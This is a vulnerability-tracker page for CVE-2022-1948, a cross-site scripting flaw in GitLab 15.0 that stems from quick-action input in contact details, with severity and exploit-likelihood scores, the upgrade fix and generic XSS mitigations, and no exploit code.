Cyber Resilience

CVE-2022-1948

High

Published: 28 July 2022

Published
28 July 2022
Modified
21 November 2024
KEV Added
Patch
CVSS Score v3.1 8.7 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
EPSS Score 0.0134 80.4th percentile
Risk Priority 18 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2022-1948 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Gitlab Gitlab. Its CVSS base score is 8.7 (High).

Operationally, ranked in the top 19.6% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

Deeper analysis

CVE-2022-1948 is a cross-site scripting vulnerability (CWE-79) affecting GitLab versions 15.0 through 15.0.0. It stems from insufficient validation of input supplied to quick actions, which permitted injection of HTML into contact details fields.

An authenticated attacker with low privileges could supply crafted input that executes arbitrary script in the context of other users' sessions when the contact details are rendered, achieving impacts rated at CVSS 8.7 including confidentiality and integrity loss across affected instances.

Public advisories from GitLab reference the issue in their security tracker and CVE JSON records, directing users to upgrade to version 15.0.1 where the input validation was corrected.

EPSS for the CVE rose sharply from a low baseline to a peak of 0.2332 on 2025-12-11 before receding to the current 0.0134, indicating that exploitation interest increased substantially after disclosure.

EU & UK References

Vulnerability details

An issue has been discovered in GitLab affecting all versions starting from 15.0 before 15.0.1. Missing validation of input used in quick actions allowed an attacker to exploit XSS by injecting HTML in contact details.

CWE(s)

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

gitlab
gitlab
15.0.0

Mitigating Controls

Likely Mitigating Controls AI

Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.

addresses: CWE-79

Penetration testing submits XSS payloads to web applications, detecting cross-site scripting flaws for subsequent remediation.

addresses: CWE-79

Validates web inputs to reject script-related content that could produce XSS.

addresses: CWE-79

Output validation against expected content can reject or sanitize script content in generated web pages, reducing XSS exploitability.

References